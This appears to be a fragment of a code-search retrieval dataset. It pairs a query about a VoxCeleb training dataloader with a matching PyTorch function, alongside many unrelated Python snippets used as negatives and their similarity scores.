self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def __init__(self, disk_radius=None, even_sampling=False, no_data_value=None, ignore_labels=None):\n self.disk_radius = disk_radius\n self.ignore_labels = [] if ignore_labels is None else ignore_labels\n self.even_sampling = even_sampling\n self.no_data_value = no_data_value", "def initP0(self, size, radius):\n return h.circle(size, radius)[:, :, 0]", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def __init__(self, *args, **kwargs):\n _gdi_.PseudoDC_swiginit(self,_gdi_.new_PseudoDC(*args, **kwargs))", "def __init__(self,min_instances=30, drift_level=3.0):\n\n from math import sqrt\n self.min_instances = min_instances\n self.drift_level = float(drift_level)\n self.i = None\n self.pi = None\n self.si = None\n self.pi_min = None\n self.si_min = None\n self.sqrt=sqrt\n self.reset()", "def __init__(self):\n super().__init__()\n self.mu = 0.0\n self.type = 'Poisson'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def _create_example_door():\n return Door({\"warning\": False, \"closed\": True, \"locked\": False})", "def construct_random_initial(self):\n x = np.random.random((self._crv_size, self._bound))\n return x", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def __make_slide(self):\n # Create base rectangle for slide\n length = self.parameters['slide_base_length'] + self.parameters['bearing_slide_travel']\n width = self.parameters['slide_width']\n height = self.parameters['slide_height']\n slide = fso.Box(x=length,y=width,z=height)\n # Create the mounting holes\n radius = 0.5*self.parameters['slide_screw_size']\n base_hole = fso.Cylinder(r=radius, l=2*height)\n hole_list = []\n for i in (-1,1):\n for j in (-1,1):\n xpos = i*(0.5*length - self.parameters['slide_screw_inset'])\n ypos = j*(0.5*self.parameters['slide_screw_dW'])\n hole = base_hole.copy()\n hole.translate([xpos,ypos,0])\n hole_list.append(hole)\n # Remove hole material\n slide -= hole_list\n slide.set_color(self.slide_color,recursive=True)\n self.slide = slide", "def __init__(self, r1=4.5*0.0254, r2=4.5*0.0254,\n d1=25.0*0.0254, d2=25.0*0.0254,\n Ixx=185000.0*0.45359237*0.0254**2,\n Iyy=185000.0*0.45359237*0.0254**2,\n Izz=3500.0*0.45359237*0.0254**2,):\n self.r1 = r1 # m\n self.r2 = r2 # m\n self.d1 = d1 # m\n self.d2 = d2 # m\n self.Ixx = Ixx # kg-m^2\n self.Iyy = Iyy # kg-m^2\n self.Izz = Izz # kg-m^2", "def selection(self):\n if not self._selection:\n return None\n \n year, month = self._date.year, self._date.month\n return self.datetime(year, month, int(self._selection[0]))", "def _generate_solution(self):\n \n operation_list = []\n available = {job.get_job_id(): [operation for operation in job.get_operations() if operation.get_sequence() == 0] for job in self.jssp_instance_data.jobs} # dictionary of first unprocessed operations of each job\n \n while 0 < len(available):\n rand_job_id = random.choice(list(available.keys()))\n rand_operation = random.choice(available[rand_job_id])\n rand_machine = np.random.choice(rand_operation.get_required_machines())\n\n available[rand_job_id].remove(rand_operation)\n \n if len(available[rand_job_id]) == 0:\n # if selected operation is last operation of the job \n if rand_operation.get_sequence() == self.jssp_instance_data.get_job(rand_job_id).get_max_sequence():\n del available[rand_job_id]\n else:\n available[rand_job_id] = [t for t in self.jssp_instance_data.get_job(rand_job_id).get_operations() if\n t.get_sequence() == rand_operation.get_sequence() + 1]\n\n\n operation_list.append([rand_job_id, rand_operation.get_operation_id(), rand_operation.get_sequence(), rand_machine]) # chromosome representation \n return Solution(self.jssp_instance_data, np.array(operation_list, dtype=np.intc))", "def __init__(self, dict = {}):\r\n if dict == {}:\r\n self.zero_val()\r\n else:\r\n self.piDD = dict\r\n self.top_node = utilities.max_length_in_list(self.return_keys())\r\n if self.piDD[self.top_node] == None:\r\n self.dim = 0\r\n else:\r\n self.dim = self.piDD[self.top_node][0][0]", "def __init__(self):\n\n self.P = list()\n self.label = 0", "def __init__(self, radius=0.5, extra={}):\n self.radius = radius\n self.sensors = [] # array of Attached\n self.id_sensors = None\n self.id_dynamics = None # XXX\n self.dynamics = None\n self.extra = extra\n\n self.primitives = set()\n\n # Needs to be initialized before calling certain functions\n self._state = None", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def eta23pi ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n ## \n pre_eta = self.make_selection (\n ## the unique tag \n 'PreEta3Pi' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ## algorithm properties \n DecayDescriptor = \" eta -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 700 * MeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" , \n ##\n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'eta' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['ETA_PT'] ) ,\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 ) \n \"\"\" % self['ETA_PT']\n )\n ##\n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Eta23pi' ,\n Pi0Veto__Tagger2g ,\n [ pre_eta ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25016 ## unique ! \n )", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def __init__(self, d):\n\t\tself._coords = [0] * d", "def test_non_it(self):\n self.idx = [9, 11, 6, 10, 12, 2, 8, 1, 5, 0, 7, 4, 3]\n selector = PCovCUR(n_to_select=12, iterative=False)\n selector.fit(self.X, self.y)\n\n self.assertTrue(np.allclose(selector.selected_idx_, self.idx[:-1]))", "def __init__(self):\n\n # Assign a nullptr for the device-side pointers. These will be set if the GPU is utilized.\n self.ng = int(0)\n self.goals = ct.POINTER(ct.c_uint)()\n self.currentHorizon = int(0)\n self.V = ct.POINTER(ct.c_float)()\n self.VPrime = ct.POINTER(ct.c_float)()\n self.pi = ct.POINTER(ct.c_uint)()\n self.ne = int(0)\n self.expanded = ct.POINTER(ct.c_int)()\n self.d_goals = ct.POINTER(ct.c_uint)()\n self.d_S = ct.POINTER(ct.c_int)()\n self.d_T = ct.POINTER(ct.c_float)()\n self.d_R = ct.POINTER(ct.c_float)()\n self.d_V = ct.POINTER(ct.c_float)()\n self.d_VPrime = ct.POINTER(ct.c_float)()\n self.d_pi = ct.POINTER(ct.c_uint)()\n self.d_expanded = ct.POINTER(ct.c_int)()\n\n # Additional informative variables.\n self.Rmin = None\n self.Rmax = None", "def selected_choice(self):\r\n choice = zeros(self.num_agents)\r\n random_numbers = self.generate_random_numbers()\r\n\r\n self.prob_cumsum = self.cumprob().filled(-1)\r\n\r\n for i in range(self.num_choices):\r\n # Indicator for the zero cells in the choice array\r\n #indicator_zero_cells = ones(self.num_agents)\r\n indicator = array([True]*self.num_agents)\r\n\r\n zero_indices = choice == 0\r\n #indicator_zero_cells[~zero_indices] = ma.masked\r\n indicator[~zero_indices] = False\r\n\r\n # Indicator for the cells where the random number\r\n # is less than the probability\r\n #indicator_less_cells = ones(self.num_agents)\r\n #indicator_less_cells = array([True]*self.num_agents)\r\n less_indices = random_numbers < self.prob_cumsum[:,i]\r\n #indicator_less_cells[~less_indices] = ma.masked\r\n #indicator_less_cells\r\n indicator[~less_indices] = False\r\n\r\n\r\n #indicator_less_zero_cells = indicator_zero_cells + indicator_less_cells\r\n\r\n #indicator_less_zero_cells = indicator_less_zero_cells == 2\r\n\r\n choice[indicator] = i + 1\r\n\r\n choice.shape = (self.num_agents, 1)\r\n\r\n #alt_text = []\r\n #for i in choice:\r\n # alt_text.append(self.choices[int(i[0])-1])\r\n #alt_text = array(alt_text)\r\n #alt_text.shape = (self.num_agents, 1)\r\n\r\n #return alt_text\r\n #print choice\r\n return DataArray(choice, ['selected choice'])", "def __init__(self, analogue_selection='indep', clock_selection='in', cal_mode='no_cal', clk_speed=800):\n self.value = 0\n self.value |= (0b1 << 2) # disable chip version output bit\n self.value |= (0b1 << 3) # set demux to 1:2\n clk_bits = 0b00 if (clk_speed<125) else 0b01 if (clk_speed<250) else 0b10 if (clk_speed<500) else 0b11\n self.value |= (clk_bits << 12) # control wait bit calibration value is dependent on clk speed\n self.value |= (1 << 14) # set FDataReady to Fs/2. I don't know what this means\n self.set_analogue_selection(analogue_selection)\n self.set_clock_selection(clock_selection)\n self.set_cal_mode(cal_mode)", "def pi(self):\n return self(self._real_field().pi())", "def __init__(self):\n super().__init__()\n self.lambdaVar = 1.0\n self.low = 0.0\n self.type = 'Exponential'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, params):\r\n _params = {'Similarity': 0.97,\r\n 'Application': 'cdhit',\r\n 'Algorithm': 'cdhit: \"longest-sequence-first list removal algorithm\"'}\r\n _params.update(params)\r\n OtuPicker.__init__(self, _params)", "def __init__(self, goal=0, kP=1, kI=1, kD=1, init_pt=0):\n self._pid_lock = threading.Lock()\n\n self.set_goal(goal)\n self.reset(init_pt)\n self.set_gains({\n PIDController.KP_KEY: kP,\n PIDController.KI_KEY: kI,\n PIDController.KD_KEY: kD\n })", "def __init__(\n self, voltage={0:(0, 0)}, rate=500, repetitions=1,\n board_name='cDAQ1Mod1', voltage_limits=None, num_channels=7):\n self.board_name = board_name #Check Measurement and Automation Explorer\n self._taskHandle = ctypes.c_void_p(0)\n self.num_channels = num_channels\n DAQmxErrChk(api.DAQmxCreateTask(\"\", ctypes.byref(self._taskHandle)))\n DAQmxErrChk(api.DAQmxCreateAOVoltageChan(\n self._taskHandle,\n self.board_name + \"/ao0:%i\"%(num_channels - 1),\n \"\",\n ctypes.c_double(-10.0), #Minimum voltage\n ctypes.c_double(10.0), #Maximum voltage\n 10348, #DAQmx_Val_Volts; don't question it!\n ctypes.c_void_p(0), #NULL\n ))\n self.num_points_written = ctypes.c_long(0)\n self._unwritten_voltages = False\n self._unplayed_voltages = False\n self.set_voltage_and_timing(voltage, rate, repetitions, voltage_limits)\n return None", "def select(self):\n\n return self.p[0], self.p[1]", "def null(cls, d=2):\n return cls(*[0 for i in range(d)])", "def get_selection(self, selection_name, format=None):", "def __init__(self, pin1=24, pin2=28, pin3=25, pin4=33):\n self.GP = GPIOProcessor()\n self.pin1 = self.GP.getPin(pin1)\n self.pin2 = self.GP.getPin(pin2)\n self.pin3 = self.GP.getPin(pin3)\n self.pin4 = self.GP.getPin(pin4)\n self.pinl = [self.pin1, self.pin2, self.pin3, self.pin4]\n\n for k in range(4):\n self.pinl[k].out()\n\n self.speed = 100.0", "def circle(self):\n return circle(self.N, self.o, self.r)", "def p_selection(p_init, it, n_iters):\n it = int(it / n_iters * 10000)\n\n if 10 < it <= 50:\n p = p_init / 2\n elif 50 < it <= 200:\n p = p_init / 4\n elif 200 < it <= 500:\n p = p_init / 8\n elif 500 < it <= 1000:\n p = p_init / 16\n elif 1000 < it <= 2000:\n p = p_init / 32\n elif 2000 < it <= 4000:\n p = p_init / 64\n elif 4000 < it <= 6000:\n p = p_init / 128\n elif 6000 < it <= 8000:\n p = p_init / 256\n elif 8000 < it <= 10000:\n p = p_init / 512\n else:\n p = p_init\n\n return p", "def select_arm(self):\n\n # Exploitation\n if random.uniform(0, 1) > self.epsilon:\n return np.argmax(self.values)\n\n # Exploration\n else:\n return random.randrange(len(self.values))", "def pick(self):\n\n pickerdict = {}\n current_value = 0\n\n if len(self.choices) == 0:\n return None\n\n if len(self.choices) == 1:\n return self.choices[0][0]\n\n for option in self.choices:\n pickerdict[current_value] = option[0]\n current_value += option[1]\n\n picker = random.randint(0, current_value)\n last_value = 0\n result = None\n sorted_keys = sorted(pickerdict.keys())\n\n found = False\n for key in sorted_keys:\n if key >= picker:\n result = pickerdict[last_value]\n found = True\n continue\n last_value = key\n\n if not found:\n result = pickerdict[sorted_keys[-1]]\n\n return result", "def select(self):\n pass", "def select(self):\n pass", "def __init__(self, choice):\r\n self.choice = choice", "def make_car():\n car = Car() \n car.drop_val = random.randint(0,1)\n\n if car.drop_val == 0:\n car.drop_x = random.randint(77, 400) * 2\n\n elif car.drop_val == 1:\n car.drop_y = random.randint(62, 300) *2\n\n return car", "def __init__(self, D, K):\n\t\tself.D = D \n\t\tself.K = K \n\t\tself.V = np.zeros((D+1,K))\n\t\treturn", "def dropdown(self):\n # defaults = DDConfig(0.6, 0.6, 0, 0)\n return DropDown(self.name, self.command, **self.config)", "def __init__(self, inplace=False):\n super(SELU, self).__init__()\n self.inplace = inplace", "def __init__(self, motor, OD_range=None, motor_range=None,\n motor_min=None, OD_min=None, motor_max=None, OD_max=None):\n self.motor = motor\n if OD_range is not None:\n self.OD_range = OD_range\n if motor_range is not None:\n self.motor_range = motor_range\n\n if motor_min is not None:\n self.motor_min = motor_min\n else:\n self.motor_min = motor_range[0]\n\n if motor_max is not None:\n self.motor_max = motor_max\n else:\n self.motor_max = motor_range[1]\n\n if OD_min is not None:\n self.OD_min = OD_min\n else:\n self.OD_min = OD_range[0]\n\n if OD_max is not None:\n self.OD_max = OD_max\n else:\n self.OD_max = OD_range[1]", "def touching_choice(self,p):\n\n part = ['head', 'foot1', 'foot2', 'foot3', 'foot4', 'back', 'stomach', 'tail']\n if len(self.select[p]) == 0:\n return random.sample(part,2)\n elif len(self.select[p]) == 1:\n part.remove(self.select[p][0])\n c = random.sample(part,1)\n return [self.select[p][0], c[0]]\n else:\n return random.sample(self.select[p],2)", "def select(self):\r\n pass", "def __init__(self, r: float, i: float = 0):\n self.r = r\n self.i = i", "def __init__(self, tpose, mpose, tselect=[], mselect=[]):\n self.target = tpose\n self.mobile = mpose\n self.target_residues = res_selector_to_size_list(tselect)\n self.mobile_residues = res_selector_to_size_list(mselect)\n self.set_target_sequence()\n self.set_mobile_sequence()\n self.atoms = ['N','C','CA']\n self.bb_rmsd = None", "def create_soft_cluster():\n # node, index_component, inf_val = general.get_soft_selection()\n soft_element_data = general.get_soft_selection()\n selection = [vtx_component for vtx_component, inf_val in soft_element_data]\n\n pm.select(selection, r=True)\n cluster = pm.cluster(relative=True)\n\n for vtx_component, inf_val in soft_element_data:\n pm.percent(cluster[0], vtx_component, v=inf_val)\n pm.select(cluster[1], r=True)\n\n return cluster", "def __init__(self):\n {}\n #generate a monoid Q\n self.monoid_Q = self.generateQ()[0]\n self.relationOfElements_Q = self.generateQ()[1]\n self.p_Position = self.generateQ()[2]\n self.qOfPosition = self.generateQ()[3]\n #print(self.qOfPosition)", "def zero_val(self):\r\n self.piDD = {\"[0]\": None}\r\n self.top_node = \"[0]\"\r\n self.dim = 0", "def get_slider():\n return dcc.RangeSlider(\n id='hours',\n value=[0, 23],\n min=0,\n max=23,\n marks={i: str(i) for i in range(0, 24, 3)}\n )", "def choose_pos(self):\n s = self\n\n availablepos = []\n for dblock in s.pjs.dblocks:\n is_available = True\n\n for powerup in s.pjs.powerups:\n if powerup.rects[0].overlap(dblock.rects[0]):\n is_available = False\n break\n\n if is_available:\n availablepos.append(dblock.rpos)\n\n pos = random.randint(0, len(availablepos) - 1)\n s.rpos = availablepos[pos]", "def __init__(self):\n super().__init__()\n self.low = 0.0\n self.high = 1.0\n self.alpha = 0.0\n self.beta = 0.0\n self.type = 'Beta'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('Jacobi')\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'Jacobi'\n self.preferredPolynomials = 'Jacobi'", "def selectPointsUnderCursor(self):\n spw = self.spw\n sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids is None:\n return\n #t0 = time.time()\n spw.SelectSpikes(sids, on=self.selecting)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def selection(self) -> Chromosome:\n # each chromosome has a fitness, and the lower the fitness, the higher the probability of election\n choices_list = list(range(len(self._population)))\n weights = [1 / chromosome.get_fitness() for chromosome in self._population]\n\n index = choices(choices_list, weights=weights)[0]\n\n return self._population[index]", "def create_pressure_vessel_geometry():\r\n\r\n # configure sigmoid function\r\n bounds_upper = [3, 6]\r\n h = 5\r\n w = 6\r\n\r\n sigmoid_function = lambda x: (1 / (1 + np.exp(-1 * h * x + w))) + 1\r\n\r\n sigmoid_function_reverse = lambda x: 1 / (1 + np.exp(h * x - w - 18)) + 1\r\n\r\n funcs_upper = [sigmoid_function, sigmoid_function_reverse]\r\n\r\n bounds_lower = None\r\n funcs_lower = 0\r\n\r\n x_max = 6\r\n x_min = 0\r\n resolution = 10000\r\n\r\n pressure_vessel = Geometry(x_max, x_min, resolution,\r\n bounds_upper, funcs_upper,\r\n bounds_lower, funcs_lower)\r\n\r\n return pressure_vessel", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)" ]
[ "0.65183586", "0.6036616", "0.58945334", "0.55806303", "0.5347493", "0.53058124", "0.5261733", "0.51529664", "0.50806415", "0.5059661", "0.50538725", "0.50354403", "0.5012788", "0.4933138", "0.49302754", "0.48780695", "0.48642525", "0.4854433", "0.4833495", "0.48240137", "0.4793768", "0.47933662", "0.478876", "0.47886172", "0.47840276", "0.47784555", "0.47292686", "0.47277686", "0.47275457", "0.4723399", "0.47140983", "0.46943375", "0.4684248", "0.4681723", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46263233", "0.46227065", "0.46197912", "0.4606822", "0.46054325", "0.46035653", "0.4589436", "0.45894", "0.45707285", "0.45663157", "0.45569476", "0.45543933", "0.45372185", "0.4531875", "0.45277584", "0.45277193", "0.4526098", "0.45167056", "0.45129544", "0.45127553", "0.44958597", "0.449459", "0.44927624", "0.44874167", "0.44785053", "0.447828", "0.44742787", "0.44716415", "0.4465707", "0.44648972", "0.44614938", "0.44611254", "0.44586134", "0.44572446", "0.44523677", "0.44516554", "0.44516554", "0.44455868", "0.44427782", "0.4439188", "0.4433058", "0.44299138", "0.44277158", "0.44272554", "0.44166902", "0.4415884", "0.44089264", "0.44023633", "0.43929407", "0.43907556", "0.43897092", "0.43888915", "0.43872088", "0.43813017", "0.4378417", "0.43783", "0.43780282", "0.43780282" ]
0.5167268
7
dataloader for training dataset via voxsampler.
def load_train(trainlst, traindir, maptrain5994, L=L, batch_size=batch_size, num_worker=num_worker, max_utt_per_spk=max_utt_per_spk, load_wav=None): if load_wav is None: def load_train_wav(path): return loadWAV(path, L=L, evalmode=False) else: load_train_wav = load_wav df_train = pd.read_csv(trainlst, sep=" ", header=None, names=["speaker", "file"]) df_train["file"] = df_train["file"].apply(lambda x: traindir + x) map_train = dict(pd.read_csv(maptrain5994, header=None).values) data = voxceleb2(df_train.values, map_train, load_train_wav) sampler = voxsampler(df_train, map_train, max_utt_per_spk=max_utt_per_spk, batch_size=batch_size) dataloader = DataLoader(data, batch_size=batch_size, num_workers=num_worker, shuffle=False, sampler=sampler) return dataloader
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def train_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_train, **self.dl_kwargs)", "def dataloader(self):\n\n # load / split data\n train_data = self.data.get_train_data()\n if self.args.use_dev:\n train_data, dev_data = self.data.split_data(train_data)\n test_data = self.data.get_test_data()\n\n #print(train_data[0])\n #print(dev_data[0])\n #print(test_data[0])\n\n # build dataset\n train_dataset = self.loader.build_dataset(\n train_data, \n self.args.train_max_seq_len)\n train_loader = self.loader.build_dataloader(\n train_dataset, 'train')\n\n test_dataset = self.loader.build_dataset(\n test_data,\n self.args.eval_max_seq_len)\n test_loader = self.loader.build_dataloader(\n test_dataset, 'test')\n\n if self.args.use_dev:\n dev_dataset = self.loader.build_dataset(\n dev_data,\n self.args.eval_max_seq_len)\n dev_loader = self.loader.build_dataloader(\n dev_dataset, 'dev')\n return train_loader, dev_loader, test_loader\n else:\n return train_loader, test_loader", "def test_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_test, **self.dl_kwargs)", "def train_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def train_dataloader(self):\r\n\r\n # transformation\r\n train_transform = Compose(\r\n [\r\n ApplyTransformToKey(\r\n key='video',\r\n transform=Compose(\r\n [\r\n UniformTemporalSubsample(8),\r\n Lambda(lambda x: x / 255.0),\r\n Normalize((0.45, 0.45, 0.45), (0.225, 0.225, 0.225)),\r\n RandomShortSideScale(min_size=256, max_size=320),\r\n RandomCrop(244),\r\n RandomHorizontalFlip(p=0.5),\r\n ]\r\n )\r\n )\r\n ]\r\n )\r\n\r\n train_dataset = pv.data.Kinetics(\r\n data_path=os.path.join(self._DATA_PATH, \"train\"),\r\n clip_sampler=pv.data.make_clip_sampler(\"random\", self._CLIP_DURATION),\r\n decode_audio=False,\r\n transform=train_transform\r\n )\r\n return torch.utils.data.DataLoader(\r\n train_dataset,\r\n batch_size=self._BATCH_SIZE,\r\n num_workers=self._NUM_WORKERS,\r\n )", "def train_dataloader(self) -> DataLoader:\n return DataLoader(\n self.train_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=True,\n num_workers=multiprocessing.cpu_count(),\n )", "def val_dataloader(self) -> torch.utils.data.DataLoader: \n return torch.utils.data.DataLoader(self.dataset_valid, **self.dl_kwargs)", "def create_dataloader(data):\r\n input_ids = torch.LongTensor([sent['input_ids'] for sent in data])\r\n input_mask = torch.LongTensor([sent['input_mask'] for sent in data])\r\n segment_ids = torch.LongTensor([sent['segment_ids'] for sent in data])\r\n label_ids = torch.LongTensor([sent['label_ids'] for sent in data])\r\n\r\n dataset = TensorDataset(input_ids, input_mask, segment_ids, label_ids)\r\n\r\n train_sampler = RandomSampler(dataset)\r\n dataloader = DataLoader(dataset, sampler=train_sampler, batch_size=BATCH_SIZE)\r\n\r\n return dataloader", "def dataloader(self):\n return DataLoader", "def dataloader_vatexEnglish_train(args, tokenizer):\n\n vatexEnglish_dataset = VATEXENGLISH_multi_sentence_dataLoader(\n subset=\"train\",\n data_path=args.data_path,\n features_path=args.features_path,\n max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(vatexEnglish_dataset)\n\n dataloader = DataLoader(\n vatexEnglish_dataset,\n batch_size=args.batch_size // args.n_gpu,\n num_workers=args.num_thread_reader,\n pin_memory=False,\n shuffle=(train_sampler is None),\n sampler=train_sampler,\n drop_last=True,\n )\n\n return dataloader, len(vatexEnglish_dataset), train_sampler", "def _get_dataloader(samples, batch_size):\n print(\"Cogiendo dataloader\")\n return DataLoader(samples, shuffle=True, batch_size=batch_size)", "def test_dataloader(self) -> data.DataLoader:\n return data.DataLoader(dataset=self.datasets['test'], batch_size=self.batch_size,\n num_workers=self.num_workers, shuffle=False, pin_memory=False)", "def create_train_dataloader(configs):\n train_lidar_aug = OneOf([\n Random_Rotation(limit_angle=np.pi / 4, p=1.0),\n Random_Scaling(scaling_range=(0.95, 1.05), p=1.0),\n ], p=0.66)\n train_dataset = KittiDataset(configs, mode='train', lidar_aug=train_lidar_aug, hflip_prob=configs.hflip_prob,\n num_samples=configs.num_samples)\n train_sampler = None\n if configs.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n train_dataloader = DataLoader(train_dataset, batch_size=configs.batch_size, shuffle=(train_sampler is None),\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=train_sampler)\n\n return train_dataloader, train_sampler", "def _init_train_loader(self):\n # Choose the right dataset type\n if self.config_args[\"num_members\"] > 1:\n class_dataset_wrapper = dataset_wrapper.MixMoDataset\n else:\n class_dataset_wrapper = dataset_wrapper.MSDADataset\n\n # Load augmentations\n self.traindatasetwrapper = class_dataset_wrapper(\n dataset=self.train_dataset,\n num_classes=int(self.config_args[\"data\"][\"num_classes\"]),\n num_members=self.config_args[\"num_members\"],\n dict_config=self.config_args[\"training\"][\"dataset_wrapper\"],\n properties=self.properties\n )\n\n # Build standard sampler\n _train_sampler = torch.utils.data.sampler.RandomSampler(\n data_source=self.traindatasetwrapper, ## only needed for its length\n num_samples=None,\n replacement=False,\n )\n\n # Wrap it with the repeating sampler used for multi-input models\n batch_sampler = batch_repetition_sampler.BatchRepetitionSampler(\n sampler=_train_sampler,\n batch_size=self.batch_size,\n num_members=self.config_args[\"num_members\"],\n drop_last=True,\n config_batch_sampler=self.config_args[\"training\"][\"batch_sampler\"]\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.traindatasetwrapper,\n batch_sampler=batch_sampler,\n num_workers=self.num_workers,\n batch_size=1,\n shuffle=False,\n sampler=None,\n drop_last=False,\n pin_memory=True,\n )", "def prepare_dataloader(opt, dataobj):\n\n def 